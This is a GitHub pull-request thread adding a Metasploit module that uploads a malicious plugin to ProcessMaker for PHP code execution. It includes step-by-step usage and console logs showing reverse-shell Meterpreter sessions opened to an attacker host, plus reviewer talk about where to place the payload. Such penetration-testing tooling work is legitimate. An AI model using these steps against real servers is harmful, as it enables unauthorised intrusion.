Add ProcessMaker Plugin Upload module

[bcoles]

This PR adds an exploit for ProcessMaker.

    This module will generate and upload a plugin to ProcessMaker
    resulting in execution of PHP code as the web server user.

    Credentials for a valid user account with Administrator roles
    is required to run this module.

    This module has been tested successfully on ProcessMaker
    versions 1.6-4276, 2.0.23, 3.0 RC 1, 3.2.0 on Windows 7 SP 1;
    and version 3.2.0 on Debian Linux 8.

Verification

• Start msfconsole
• use exploit/multi/http/processmaker_plugin_upload
• set rhost <RHOST>
• set username <USERNAME>
• set password <PASSWORD>
• set workspace <WORKSPACE>
• run
• Verify you get a session

Example Output

msf exploit(processmaker_plugin_upload) > run

[*] Started reverse TCP handler on 172.16.191.181:4444 
[*] Authenticating as user 'admin'
[+] 172.16.191.202:8080 Authenticated as user 'admin'
[*] 172.16.191.202:8080 Uploading plugin 'zqkMpDOiIlNEvhkNnV' (23552 bytes)
[*] Sending stage (33986 bytes) to 172.16.191.202
[*] Meterpreter session 1 opened (172.16.191.181:4444 -> 172.16.191.202:36592) at 2017-06-10 04:21:25 -0400
[+] Deleted ../../shared/sites/sample/files/input/zqkMpDOiIlNEvhkNnV-.tar
[+] Deleted ../../shared/sites/sample/files/input/zqkMpDOiIlNEvhkNnV.php
[+] Deleted ../../shared/sites/sample/files/input/zqkMpDOiIlNEvhkNnV/class.zqkMpDOiIlNEvhkNnV.php

meterpreter > getuid
Server username: user (1000)
meterpreter > sysinfo 
Computer    : debian
OS          : Linux debian 3.16.0-4-amd64 #1 SMP Debian 3.16.43-2 (2017-04-30) x86_64
Meterpreter : php/linux
meterpreter > exit

Installation

Source and Installers:

• ProcessMaker

[bcoles]

@wvu-r7

[wvu-r7]

Bumping #8018.

[bcoles]

I found the best place to put the payload was in the install method.

Putting the payload in the enable method requires an extra HTTP request to trigger the payload; and also increases the chances something could go wrong if the code path to enable a module is changed in the future.

Putting the payload in the disable method is nice, because this method gets called automatically when we remove the plugin during cleanup. Unfortunately this is also problematic, because every attempt to remove the plugin calls the disable method, triggering the payload. This prevents the cleanup method from successfully removing the plugin from the web interface.

[bcoles]

Although this code block isn't ideal, triggering the payload during plugin installation was the best approach as per comments below.

[brandonprry]

Testing this

[brandonprry]

This works for me.

msf > use exploit/multi/http/processmaker_plugin_upload 
msf exploit(processmaker_plugin_upload) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf exploit(processmaker_plugin_upload) > set USERNAME admin
USERNAME => admin
msf exploit(processmaker_plugin_upload) > set PASSWORD bitnami
PASSWORD => bitnami
msf exploit(processmaker_plugin_upload) > exploit

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Authenticating as user 'admin'
[+] 192.168.56.101:80 Authenticated as user 'admin'
[*] 192.168.56.101:80 Uploading plugin 'AWJsFsAPWQpGbNyTDdV' (23552 bytes)
[*] Sending stage (33986 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:36410) at 2017-06-24 11:41:11 -0500
[+] Deleted ../../shared/sites/workflow/files/input/AWJsFsAPWQpGbNyTDdV-.tar
[+] Deleted ../../shared/sites/workflow/files/input/AWJsFsAPWQpGbNyTDdV.php
[+] Deleted ../../shared/sites/workflow/files/input/AWJsFsAPWQpGbNyTDdV/class.AWJsFsAPWQpGbNyTDdV.php

meterpreter > getuid
Server username: daemon (1)
meterpreter > 

[brandonprry]

I think unless is preferred.

[brandonprry]

Why not use Rex::MIME::Message?

[bcoles]

I've had issues with 0x0D in the past.

I don't remember if that was an issue here - I might have just assumed Rex::MIME::Message would be problematic.

[bcoles]

It's worth noting that there's no (feasible) way to control the binary data to prevent use of 0x0D as the post data is a generated TAR archive. It is not subject to BadChars restrictions.

[sempervictus]

@bcoles: for a trophy wife, you sure as hell pr like a champ.
I think some/lots of this belongs in lib... Wanna take a stab at the ecosystem past the use case ;-)?

[bcoles]

@sempervictus I don't understand.

This code isn't likely to be re-used - what part of this should belong in ./lib/ ?

[sempervictus]

@bcoles: I hit the wrong PR I'd on that, sorry. Comment stands alone though - you implement a lot of useful functionality

[bcoles]

This module is made more useful by these bugs (currently un-patched):

• http://bugs.processmaker.com/view.php?id=22862
• http://bugs.processmaker.com/view.php?id=22863

[bcoles]

This PR is blocked on #8018 to add a reg_dir_for_cleanup method.

[busterb]

sounds like reg_dir_for_cleanup ought to be next on the hit list

[bcoles]

Bump

[sempervictus]

Oh fun. Why a lib require in a module?

[bcoles]

@sempervictus feedback from @Chiggins indicated that the following error occurs without the require

I'm not sure why, as I tested with and without the require and the module works in both instances for me, on latest msf5 dev branch.

I opted to add the require, as the modules/auxiliary/admin/http/telpho10_credential_dump.rb module also makes use of Gem::Package::TarReader, like this module does, and that module also includes the require.

[Chiggins]

Yeah I'm not a big fan of requiring a library inside a module, but if that's the specialized case with this then ¯_(ツ)_/¯

[sempervictus]

If its ok with everyone, let's move the require somewhere into a higher level mixin if we can or just use a more common archive parser (Rex has some, right?). I can't tell you how many times I messed something up having a req in my plugins and expecting it to have already been spun up when the module leader got to something. Pretty sure I've borked PRs when upstreaming that way too.

[bcoles]

I agree with not including library requirements in modules. However, chiggins volunteered to manage this PR, and given the exploit failed for him that didn't leave me much choice.

No, Rex does not have a Tar archive parser.

[sempervictus]

Hmm, we should probably make a generic Rex archive module, a d bloody add fastlib to it :-)

[bcoles]

I agree, Rex should handle creation of TAR archives. Unfortunately I don't have time to implement this. It's also outside the scope of this PR.

[bwatters-r7]

Release Notes

The exploits/multi/http/processmaker_plugin_upload module has been added to the framework. It generates and uploads a plugin to ProcessMaker to execute PHP code as the web server user. Credentials for a valid Administrator account are required to exploit this vulnerability.